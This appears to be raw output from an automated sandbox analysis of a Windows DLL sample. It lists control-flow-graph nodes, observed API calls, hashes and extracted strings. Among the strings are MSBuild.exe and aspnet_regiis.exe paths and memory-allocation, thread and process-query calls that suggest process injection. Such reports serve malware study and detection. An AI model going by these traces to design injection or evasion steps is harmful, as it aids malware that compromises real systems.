_unexpected 12275->12280 12276 6d593afa 12277 6d597250 _ValidateLocalCookies 5 API calls 12276->12277 12278 6d593b0a NtAllocateVirtualMemory 12277->12278 12278->12246 12279 6d593922 GetModuleHandleW 12279->12280 12280->12276 12280->12279 12281 6d59397d NtQueryInformationProcess 12280->12281 12281->12280 12285 6d59105f 12282->12285 12283 6d597250 _ValidateLocalCookies 5 API calls 12284 6d5912fc 12283->12284 12284->12246 12285->12283 12287 6d597e87 12286->12287 12287->12260 12287->12287 12288 6d59aa67 12303 6d59cda8 12288->12303 12293 6d59aa8f 12331 6d59aac0 12293->12331 12294 6d59aa83 12296 6d59bda4 ___free_lconv_mon 14 API calls 12294->12296 12297 6d59aa89 12296->12297 12299 6d59bda4 ___free_lconv_mon 14 API calls 12300 6d59aab3 12299->12300 12301 6d59bda4 ___free_lconv_mon 14 API calls 12300->12301 12302 6d59aab9 12301->12302 12304 6d59aa78 12303->12304 12305 6d59cdb1 12303->12305 12309 6d59d2ff GetEnvironmentStringsW 12304->12309 12353 6d59b712 12305->12353 12310 6d59aa7d 12309->12310 12311 6d59d317 12309->12311 12310->12293 12310->12294 12312 6d59d25c ___scrt_uninitialize_crt WideCharToMultiByte 12311->12312 12313 6d59d334 12312->12313 12314 6d59d349 12313->12314 12315 6d59d33e FreeEnvironmentStringsW 12313->12315 12316 6d59e2ba 15 API calls 12314->12316 12315->12310 12317 6d59d350 12316->12317 12318 6d59d369 12317->12318 12319 6d59d358 12317->12319 12321 6d59d25c ___scrt_uninitialize_crt WideCharToMultiByte 12318->12321 12320 6d59bda4 ___free_lconv_mon 14 API calls 12319->12320 12322 6d59d35d FreeEnvironmentStringsW 12320->12322 12323 6d59d379 12321->12323 12324 6d59d39a 12322->12324 12325 6d59d388 12323->12325 12326 6d59d380 12323->12326 12324->12310 12328 6d59bda4 ___free_lconv_mon 14 API calls 12325->12328 12327 6d59bda4 ___free_lconv_mon 14 API calls 12326->12327 12329 6d59d386 FreeEnvironmentStringsW 12327->12329 12328->12329 12329->12324 12332 6d59aad5 12331->12332 12333 6d59bd47 __dosmaperr 14 API calls 12332->12333 12334 6d59aafc 12333->12334 12335 
6d59ab04 12334->12335 12344 6d59ab0e 12334->12344 12336 6d59bda4 ___free_lconv_mon 14 API calls 12335->12336 12352 6d59aa96 12336->12352 12337 6d59ab6b 12338 6d59bda4 ___free_lconv_mon 14 API calls 12337->12338 12338->12352 12339 6d59bd47 __dosmaperr 14 API calls 12339->12344 12340 6d59ab7a 12709 6d59aba2 12340->12709 12344->12337 12344->12339 12344->12340 12346 6d59ab95 12344->12346 12349 6d59bda4 ___free_lconv_mon 14 API calls 12344->12349 12700 6d59afdf 12344->12700 12345 6d59bda4 ___free_lconv_mon 14 API calls 12348 6d59ab87 12345->12348 12715 6d59bc63 IsProcessorFeaturePresent 12346->12715 12351 6d59bda4 ___free_lconv_mon 14 API calls 12348->12351 12349->12344 12350 6d59aba1 12351->12352 12352->12299 12354 6d59b71d 12353->12354 12355 6d59b723 12353->12355 12356 6d59d687 __dosmaperr 6 API calls 12354->12356 12357 6d59d6c6 __dosmaperr 6 API calls 12355->12357 12359 6d59b729 12355->12359 12356->12355 12358 6d59b73d 12357->12358 12358->12359 12360 6d59bd47 __dosmaperr 14 API calls 12358->12360 12377 6d59b72e 12359->12377 12401 6d59b039 12359->12401 12363 6d59b74d 12360->12363 12364 6d59b76a 12363->12364 12365 6d59b755 12363->12365 12366 6d59d6c6 __dosmaperr 6 API calls 12364->12366 12367 6d59d6c6 __dosmaperr 6 API calls 12365->12367 12368 6d59b776 12366->12368 12369 6d59b761 12367->12369 12370 6d59b789 12368->12370 12371 6d59b77a 12368->12371 12372 6d59bda4 ___free_lconv_mon 14 API calls 12369->12372 12374 6d59b459 __dosmaperr 14 API calls 12370->12374 12373 6d59d6c6 __dosmaperr 6 API calls 12371->12373 12372->12359 12373->12369 12375 6d59b794 12374->12375 12376 6d59bda4 ___free_lconv_mon 14 API calls 12375->12376 12376->12377 12378 6d59cbb3 12377->12378 12496 6d59cd08 12378->12496 12385 6d59cc1d 12521 6d59ce03 12385->12521 12386 6d59cc0f 12387 6d59bda4 ___free_lconv_mon 14 API calls 12386->12387 12389 6d59cbf6 12387->12389 12389->12304 12391 6d59cc55 12392 6d59bd34 __dosmaperr 14 API calls 12391->12392 12394 6d59cc5a 12392->12394 12393 6d59cc9c 12396 6d59cce5 
12393->12396 12532 6d59c82c 12393->12532 12397 6d59bda4 ___free_lconv_mon 14 API calls 12394->12397 12395 6d59cc70 12395->12393 12398 6d59bda4 ___free_lconv_mon 14 API calls 12395->12398 12400 6d59bda4 ___free_lconv_mon 14 API calls 12396->12400 12397->12389 12398->12393 12400->12389 12412 6d59dc35 12401->12412 12404 6d59b049 12406 6d59b053 IsProcessorFeaturePresent 12404->12406 12407 6d59b072 12404->12407 12408 6d59b05f 12406->12408 12448 6d59a73e 12407->12448 12442 6d59ba57 12408->12442 12451 6d59db63 12412->12451 12415 6d59dc7a 12419 6d59dc86 ___scrt_is_nonwritable_in_current_image 12415->12419 12416 6d59b7a8 __dosmaperr 14 API calls 12425 6d59dcb7 _unexpected 12416->12425 12417 6d59dcd6 12418 6d59bd34 __dosmaperr 14 API calls 12417->12418 12421 6d59dcdb 12418->12421 12419->12416 12419->12417 12420 6d59dce8 _unexpected 12419->12420 12419->12425 12422 6d59dd1e _unexpected 12420->12422 12462 6d59b983 EnterCriticalSection 12420->12462 12423 6d59bc53 ___std_exception_copy 29 API calls 12421->12423 12427 6d59de58 12422->12427 12428 6d59dd5b 12422->12428 12438 6d59dd89 12422->12438 12441 6d59dcc0 12423->12441 12425->12417 12425->12420 12425->12441 12430 6d59de63 12427->12430 12494 6d59b9cb LeaveCriticalSection 12427->12494 12428->12438 12463 6d59b657 GetLastError 12428->12463 12431 6d59a73e _unexpected 21 API calls 12430->12431 12433 6d59de6b 12431->12433 12435 6d59b657 _unexpected 39 API calls 12439 6d59ddde 12435->12439 12437 6d59b657 _unexpected 39 API calls 12437->12438 12490 6d59de04 12438->12490 12440 6d59b657 _unexpected 39 API calls 12439->12440 12439->12441 12440->12441 12441->12404 12443 6d59ba73 _unexpected 12442->12443 12444 6d59ba9f IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 12443->12444 12447 6d59bb70 _unexpected 12444->12447 12445 6d597250 _ValidateLocalCookies 5 API calls 12446 6d59bb8e 12445->12446 12446->12407 12447->12445 12449 6d59a57b _unexpected 21 API calls 12448->12449 12450 6d59a74f 12449->12450 12452 6d59db6f 
___scrt_is_nonwritable_in_current_image 12451->12452 12457 6d59b983 EnterCriticalSection 12452->12457 12454 6d59db7d 12458 6d59dbbf 12454->12458 12457->12454 12461 6d59b9cb LeaveCriticalSection 12458->12461 12460 6d59b03e 12460->12404 12460->12415 12461->12460 12462->12422 12464 6d59b66d 12463->12464 12465 6d59b673 12463->12465 12466 6d59d687 __dosmaperr 6 API calls 12464->12466 12467 6d59d6c6 __dosmaperr 6 API calls 12465->12467 12469 6d59b677 SetLastError 12465->12469 12466->12465 12468 6d59b68f 12467->12468 12468->12469 12471 6d59bd47 __dosmaperr 14 API calls 12468->12471 12473 6d59b70c 12469->12473 12474 6d59b707 12469->12474 12472 6d59b6a4 12471->12472 12475 6d59b6bd 12472->12475 12476 6d59b6ac 12472->12476 12477 6d59b039 CallUnexpected 37 API calls 12473->12477 12474->12437 12479 6d59d6c6 __dosmaperr 6 API calls 12475->12479 12478 6d59d6c6 __dosmaperr 6 API calls 12476->12478 12480 6d59b711 12477->12480 12487 6d59b6ba 12478->12487 12481 6d59b6c9 12479->12481 12482 6d59b6cd 12481->12482 12483 6d59b6e4 12481->12483 12484 6d59d6c6 __dosmaperr 6 API calls 12482->12484 12486 6d59b459 __dosmaperr 14 API calls 12483->12486 12484->12487 12485 6d59bda4 ___free_lconv_mon 14 API calls 12485->12469 12488 6d59b6ef 12486->12488 12487->12485 12489 6d59bda4 ___free_lconv_mon 14 API calls 12488->12489 12489->12469 12491 6d59de08 12490->12491 12492 6d59ddd0 12490->12492 12495 6d59b9cb LeaveCriticalSection 12491->12495 12492->12435 12492->12439 12492->12441 12494->12430 12495->12492 12497 6d59cd14 ___scrt_is_nonwritable_in_current_image 12496->12497 12498 6d59cd2e 12497->12498 12540 6d59b983 EnterCriticalSection 12497->12540 12500 6d59cbdd 12498->12500 12503 6d59b039 CallUnexpected 39 API calls 12498->12503 12507 6d59c93a 12500->12507 12501 6d59cd6a 12541 6d59cd87 12501->12541 12504 6d59cda7 12503->12504 12505 6d59cd3e 12505->12501 12506 6d59bda4 ___free_lconv_mon 14 API calls 12505->12506 12506->12501 12545 6d59c43e 12507->12545 12510 6d59c95b GetOEMCP 12512 6d59c984 
12510->12512 12511 6d59c96d 12511->12512 12513 6d59c972 GetACP 12511->12513 12512->12389 12514 6d59e2ba 12512->12514 12513->12512 12515 6d59e2f8 12514->12515 12519 6d59e2c8 __dosmaperr 12514->12519 12516 6d59bd34 __dosmaperr 14 API calls 12515->12516 12518 6d59cc07 12516->12518 12517 6d59e2e3 HeapAlloc 12517->12518 12517->12519 12518->12385 12518->12386 12519->12515 12519->12517 12520 6d59dae0 __dosmaperr 2 API calls 12519->12520 12520->12519 12522 6d59c93a 41 API calls 12521->12522 12523 6d59ce23 12522->12523 12525 6d59ce60 IsValidCodePage 12523->12525 12530 6d59cf28 12523->12530 12531 6d59ce7b _unexpected 12523->12531 12524 6d597250 _ValidateLocalCookies 5 API calls 12526 6d59cc4a 12524->12526 12527 6d59ce72 12525->12527 12525->12530 12526->12391 12526->12395 12528 6d59ce9b GetCPInfo 12527->12528 12527->12531 12528->12530 12528->12531 12530->12524 12588 6d59ca0e 12531->12588 12533 6d59c838 ___scrt_is_nonwritable_in_current_image 12532->12533 12674 6d59b983 EnterCriticalSection 12533->12674 12535 6d59c842 12675 6d59c879 12535->12675 12540->12505 12544 6d59b9cb LeaveCriticalSection 12541->12544 12543 6d59cd8e 12543->12498 12544->12543 12546 6d59c455 12545->12546 12547 6d59c45c 12545->12547 12546->12510 12546->12511 12547->12546 12548 6d59b657 _unexpected 39 API calls 12547->12548 12549 6d59c47d 12548->12549 12553 6d59e308 12549->12553 12554 6d59e31b 12553->12554 12556 6d59c493 12553->12556 12554->12556 12561 6d59e887 12554->12561 12557 6d59e366 12556->12557 12558 6d59e379 12557->12558 12559 6d59e38e 12557->12559 12558->12559 12583 6d59cdf0 12558->12583 12559->12546 12562 6d59e893 ___scrt_is_nonwritable_in_current_image 12561->12562 12563 6d59b657 _unexpected 39 API calls 12562->12563 12564 6d59e89c 12563->12564 12571 6d59e8e2 12564->12571 12574 6d59b983 EnterCriticalSection 12564->12574 12566 6d59e8ba 12575 6d59e908 12566->12575 12571->12556 12572 6d59b039 CallUnexpected 39 API calls 12573 6d59e907 12572->12573 12574->12566 12576 6d59e8cb 12575->12576 12577 
6d59e916 __dosmaperr 12575->12577 12579 6d59e8e7 12576->12579 12577->12576 12578 6d59e63b __dosmaperr 14 API calls 12577->12578 12578->12576 12582 6d59b9cb LeaveCriticalSection 12579->12582 12581 6d59e8de 12581->12571 12581->12572 12582->12581 12584 6d59b657 _unexpected 39 API calls 12583->12584 12585 6d59cdf5 12584->12585 12586 6d59cd08 ___scrt_uninitialize_crt 39 API calls 12585->12586 12587 6d59ce00 12586->12587 12587->12559 12589 6d59ca36 GetCPInfo 12588->12589 12590 6d59caff 12588->12590 12589->12590 12595 6d59ca4e 12589->12595 12592 6d597250 _ValidateLocalCookies 5 API calls 12590->12592 12594 6d59cbb1 12592->12594 12594->12530 12599 6d59eff7 12595->12599 12598 6d59f307 43 API calls 12598->12590 12600 6d59c43e 39 API calls 12599->12600 12601 6d59f017 12600->12601 12619 6d59d1a2 12601->12619 12603 6d59f0d3 12606 6d597250 _ValidateLocalCookies 5 API calls 12603->12606 12604 6d59f0cb 12622 6d59f0f8 12604->12622 12605 6d59f044 12605->12603 12605->12604 12608 6d59e2ba 15 API calls 12605->12608 12610 6d59f069 _unexpected __alloca_probe_16 12605->12610 12609 6d59cab6 12606->12609 12608->12610 12614 6d59f307 12609->12614 12610->12604 12611 6d59d1a2 ___scrt_uninitialize_crt MultiByteToWideChar 12610->12611 12612 6d59f0b2 12611->12612 12612->12604 12613 6d59f0b9 GetStringTypeW 12612->12613 12613->12604 12615 6d59c43e 39 API calls 12614->12615 12616 6d59f31a 12615->12616 12628 6d59f118 12616->12628 12626 6d59d10a 12619->12626 12623 6d59f104 12622->12623 12624 6d59f115 12622->12624 12623->12624 12625 6d59bda4 ___free_lconv_mon 14 API calls 12623->12625 12624->12603 12625->12624 12627 6d59d11b MultiByteToWideChar 12626->12627 12627->12605 12629 6d59f133 12628->12629 12630 6d59d1a2 ___scrt_uninitialize_crt MultiByteToWideChar 12629->12630 12634 6d59f177 12630->12634 12631 6d59f2f2 12632 6d597250 _ValidateLocalCookies 5 API calls 12631->12632 12633 6d59cad7 12632->12633 12633->12598 12634->12631 12635 6d59e2ba 15 API calls 12634->12635 12637 6d59f19d __alloca_probe_16 
12634->12637 12655 6d59f245 12634->12655 12635->12637 12636 6d59f0f8 __freea 14 API calls 12636->12631 12638 6d59d1a2 ___scrt_uninitialize_crt MultiByteToWideChar 12637->12638 12637->12655 12639 6d59f1e6 12638->12639 12639->12655 12656 6d59d753 12639->12656 12642 6d59f21c 12648 6d59d753 6 API calls 12642->12648 12642->12655 12643 6d59f254 12644 6d59f2dd 12643->12644 12645 6d59f266 __alloca_probe_16 12643->12645 12646 6d59e2ba 15 API calls 12643->12646 12647 6d59f0f8 __freea 14 API calls 12644->12647 12645->12644 12649 6d59d753 6 API calls 12645->12649 12646->12645 12647->12655 12648->12655 12650 6d59f2a9 12649->12650 12650->12644 12662 6d59d25c 12650->12662 12652 6d59f2c3 12652->12644 12653 6d59f2cc 12652->12653 12654 6d59f0f8 __freea 14 API calls 12653->12654 12654->12655 12655->12636 12665 6d59d426 12656->12665 12660 6d59d7a4 LCMapStringW 12661 6d59d764 12660->12661 12661->12642 12661->12643 12661->12655 12663 6d59d26f ___scrt_uninitialize_crt 12662->12663 12664 6d59d2ad WideCharToMultiByte 12663->12664 12664->12652 12666 6d59d525 __dosmaperr 5 API calls 12665->12666 12667 6d59d43c 12666->12667 12667->12661 12668 6d59d7b0 12667->12668 12671 6d59d440 12668->12671 12670 6d59d7bb 12670->12660 12672 6d59d525 __dosmaperr 5 API calls 12671->12672 12673 6d59d456 12672->12673 12673->12670 12674->12535 12685 6d59d008 12675->12685 12677 6d59c89b 12678 6d59d008 29 API calls 12677->12678 12679 6d59c8ba 12678->12679 12680 6d59c84f 12679->12680 12681 6d59bda4 ___free_lconv_mon 14 API calls 12679->12681 12682 6d59c86d 12680->12682 12681->12680 12699 6d59b9cb LeaveCriticalSection 12682->12699 12684 6d59c85b 12684->12396 12686 6d59d019 12685->12686 12690 6d59d015 __InternalCxxFrameHandler 12685->12690 12687 6d59d020 12686->12687 12692 6d59d033 _unexpected 12686->12692 12688 6d59bd34 __dosmaperr 14 API calls 12687->12688 12689 6d59d025 12688->12689 12691 6d59bc53 ___std_exception_copy 29 API calls 12689->12691 12690->12677 12691->12690 12692->12690 12693 6d59d06a 12692->12693 
12694 6d59d061 12692->12694 12693->12690 12696 6d59bd34 __dosmaperr 14 API calls 12693->12696 12695 6d59bd34 __dosmaperr 14 API calls 12694->12695 12697 6d59d066 12695->12697 12696->12697 12698 6d59bc53 ___std_exception_copy 29 API calls 12697->12698 12698->12690 12699->12684 12701 6d59afed 12700->12701 12703 6d59affb 12700->12703 12701->12703 12707 6d59b013 12701->12707 12702 6d59bd34 __dosmaperr 14 API calls 12704 6d59b003 12702->12704 12703->12702 12705 6d59bc53 ___std_exception_copy 29 API calls 12704->12705 12706 6d59b00d 12705->12706 12706->12344 12707->12706 12708 6d59bd34 __dosmaperr 14 API calls 12707->12708 12708->12704 12710 6d59abaf 12709->12710 12714 6d59ab80 12709->12714 12711 6d59abc6 12710->12711 12712 6d59bda4 ___free_lconv_mon 14 API calls 12710->12712 12713 6d59bda4 ___free_lconv_mon 14 API calls 12711->12713 12712->12710 12713->12714 12714->12345 12716 6d59bc6f 12715->12716 12717 6d59ba57 _unexpected 8 API calls 12716->12717 12718 6d59bc84 GetCurrentProcess TerminateProcess 12717->12718 12718->12350
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.1580323351.000000006D591000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D590000, based on PE: true
• Associated: 00000006.00000002.1580304027.000000006D590000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.1580395645.000000006D5A4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.1580971766.000000006D5F9000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.1580971766.000000006D637000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.1581713119.000000006D662000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6d590000_uh3ex1.jbxd
Yara matches
Similarity
• API ID: Virtual$Memory$Thread$CloseHandleWrite$Context$AllocateCreateWindow$AllocConsoleReadResumeShow
• String ID: --,B$@$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe$D$FFd$FFd$G!?V$G!?V$kZEGDH2SkpIGRNUIiQYMeZKSksqRkZGRkQaEWXaEgfBddoSBYJsOo5AIx5CfguLHDrCQDpiRgv3ODpmHgvXLCbldkgmdEZ2S4JARoJAJzxGvknHGCawRrJJxw4m3iZxhp4$kernel32.dll$ntdll.dll$|+}
• API String ID: 2473863479-2953360706
• Opcode ID: 44aad0f5bf3729cf3d1470ad702a2a8b76bcd652712fa619aa3e17ce4569e271
• Instruction ID: 24be79d9e52b63aa23e7ffea0706bd7d2ab34655fa31c5e05960e93a45329f75
• Opcode Fuzzy Hash: 44aad0f5bf3729cf3d1470ad702a2a8b76bcd652712fa619aa3e17ce4569e271
• Instruction Fuzzy Hash: F443AC76A242558FCB18CF2CC990BEDB7F1FB4A300F108599E419DB760D6359E868F85
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.1580323351.000000006D591000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D590000, based on PE: true
• Associated: 00000006.00000002.1580304027.000000006D590000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.1580395645.000000006D5A4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.1580971766.000000006D5F9000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.1580971766.000000006D637000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.1581713119.000000006D662000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6d590000_uh3ex1.jbxd
Yara matches
Similarity
• API ID: CloseFileHandle$CreateModule$InformationMapping$NameProtectVirtual
                                                                                                                                                                                                                                                • String ID: (c1v$(c1v$.text$@$KuO4$KuO4$^;$aIh$b>AJ$b>AJ
                                                                                                                                                                                                                                                • API String ID: 4182465802-70789730
                                                                                                                                                                                                                                                • Opcode ID: 023209248dad6ea76e8c2da60bb847703d8de3e24018fd5a7032c198056dfbce
                                                                                                                                                                                                                                                • Instruction ID: db6b322addbd9b386a44f3aa6cb7699af51447e8ae088889cbccef5823e2c4b5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 023209248dad6ea76e8c2da60bb847703d8de3e24018fd5a7032c198056dfbce
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9AD2ED39A14265CFDB19CF6CC994BDDBBF2BB46300F008999D859DF780D63999498F02

Control-flow Graph (graph image not preserved; legend: Executed / Not Executed). API calls named in the graph: GetModuleHandleW, NtQueryInformationProcess.
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: ;o$NtQueryInformationProcess$ntdll.dll
                                                                                                                                                                                                                                                • API String ID: 0-3799071571
                                                                                                                                                                                                                                                • Opcode ID: 5bb6ff690809804ba98aef3f1d38d4696d5f0bd38118c7b239413375febd2387
                                                                                                                                                                                                                                                • Instruction ID: cbcf2412f8f0b1c461ac9a3d2ecafdef5e6a41ad520918772761535071f3a479
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5bb6ff690809804ba98aef3f1d38d4696d5f0bd38118c7b239413375febd2387
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 67B1DAB5E05285CFEB08CFACD5953DDBBF2FB4A300F10891AE819EB754CA3999058B41

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • __RTC_Initialize.LIBCMT ref: 6D5973FF
                                                                                                                                                                                                                                                • ___scrt_uninitialize_crt.LIBCMT ref: 6D597419
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Initialize___scrt_uninitialize_crt
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2442719207-0
                                                                                                                                                                                                                                                • Opcode ID: 999f7a55ce85c4b5ce16656329a3c55faf9e0916baf853429cdf0cb0ffee5cff
                                                                                                                                                                                                                                                • Instruction ID: 90ceba22f58992c4d6c42fa20bb7a50af15039855aaac26750aa2194dbdc635b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 999f7a55ce85c4b5ce16656329a3c55faf9e0916baf853429cdf0cb0ffee5cff
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9041D572E082DAABDB198F59CC40BBE7B75EB80B65F124417E9185FA40D7344E429BE0

Control-flow Graph (graph image not preserved; legend: Executed / Not Executed). Functions named in the graph: dllmain_raw, dllmain_crt_dispatch.
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3136044242-0
                                                                                                                                                                                                                                                • Opcode ID: 79a6758a8fef4b4ebd0b9903c8871e9c69cd229589c54acbe98c45d3182602dd
                                                                                                                                                                                                                                                • Instruction ID: ee44f1b538257e7961fa08219abb787bb6f7c1bf70f3ba14c7af1ac912dae624
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 79a6758a8fef4b4ebd0b9903c8871e9c69cd229589c54acbe98c45d3182602dd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82218371E0429AABCB699F55CC40A7F3F79EB80BA4F014917F9185FA14D3308D428BE0

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • __RTC_Initialize.LIBCMT ref: 6D5972FE
                                                                                                                                                                                                                                                  • Part of subcall function 6D59777B: InitializeSListHead.KERNEL32(6D661430,6D597308,6D5A9450,00000010,6D597299,?,?,?,6D5974C1,?,00000001,?,?,00000001,?,6D5A9498), ref: 6D597780
                                                                                                                                                                                                                                                • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6D597368
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                                                                                                                                                                                                • String ID: U|Ym
                                                                                                                                                                                                                                                • API String ID: 3231365870-3624290880
                                                                                                                                                                                                                                                • Opcode ID: 8ba30c6a634784afdb2becb6b81a578ba2431f32cfae7f98779c6b9c8b4753cf
                                                                                                                                                                                                                                                • Instruction ID: 4aca9c4f14c5ea02c02f3530479d44879fd73daea15606b9b68c2ae4d6674d3f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ba30c6a634784afdb2becb6b81a578ba2431f32cfae7f98779c6b9c8b4753cf
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5021C332D4C2D2DBDB1C5BB484017AD3B60DF962ADF22485BDA456FDC2DF364840C6A2

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                control_flow_graph 837 6d59d8fc-6d59d901 838 6d59d903-6d59d91b 837->838 839 6d59d929-6d59d932 838->839 840 6d59d91d-6d59d921 838->840 842 6d59d944 839->842 843 6d59d934-6d59d937 839->843 840->839 841 6d59d923-6d59d927 840->841 844 6d59d99e-6d59d9a2 841->844 847 6d59d946-6d59d953 GetStdHandle 842->847 845 6d59d939-6d59d93e 843->845 846 6d59d940-6d59d942 843->846 844->838 848 6d59d9a8-6d59d9ab 844->848 845->847 846->847 849 6d59d980-6d59d992 847->849 850 6d59d955-6d59d957 847->850 849->844 851 6d59d994-6d59d997 849->851 850->849 852 6d59d959-6d59d962 GetFileType 850->852 851->844 852->849 853 6d59d964-6d59d96d 852->853 854 6d59d96f-6d59d973 853->854 855 6d59d975-6d59d978 853->855 854->844 855->844 856 6d59d97a-6d59d97e 855->856 856->844
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 6D59D948
                                                                                                                                                                                                                                                • GetFileType.KERNELBASE(00000000), ref: 6D59D95A
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1580323351.000000006D591000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D590000, based on PE: true
• Associated: 00000006.00000002.1580304027.000000006D590000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.1580395645.000000006D5A4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.1580971766.000000006D5F9000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.1580971766.000000006D637000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.1581713119.000000006D662000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_6d590000_uh3ex1.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileHandleType
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3000768030-0
                                                                                                                                                                                                                                                • Opcode ID: 425f3f4431974581abd6b073198b7d5dcb4862e0fe56a38190ae611142047a95
                                                                                                                                                                                                                                                • Instruction ID: a7afc1fe02a4bbb94a63ab1c26f2b99b075ac6feb948ecccca8971963d8aeff9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 425f3f4431974581abd6b073198b7d5dcb4862e0fe56a38190ae611142047a95
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E91181716047D24ADB389E3E8884736BAA5ABD7270B341F1FD1BA8ADE1C734D485C641

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                control_flow_graph 857 fc4d78-fc5e6a 860 fc5e6c-fc5e6f 857->860 861 fc5e72-fc5e9d LoadLibraryW 857->861 860->861 862 fc5e9f-fc5ea5 861->862 863 fc5ea6-fc5ec3 861->863 862->863
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadLibraryW.KERNELBASE(00000000), ref: 00FC5E90
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1565578576.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_fc0000_uh3ex1.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                                                                                                                                • Opcode ID: 61117388226d7ca35a67c550991470d20ed7096666bfda5a172fecd743e97122
                                                                                                                                                                                                                                                • Instruction ID: 3ef0ebc18eab4fdb9b1b5b04861507d66168f43176e137486be82cd2efce9cdc
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 61117388226d7ca35a67c550991470d20ed7096666bfda5a172fecd743e97122
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B2147B1C0061A9BCB10CF9AC945BDEFBF4FB48720F10816AE818B7240D374AA40CFA5

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                control_flow_graph 866 fc5e1f-fc5e6a 868 fc5e6c-fc5e6f 866->868 869 fc5e72-fc5e9d LoadLibraryW 866->869 868->869 870 fc5e9f-fc5ea5 869->870 871 fc5ea6-fc5ec3 869->871 870->871
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadLibraryW.KERNELBASE(00000000), ref: 00FC5E90
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1565578576.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_fc0000_uh3ex1.jbxd
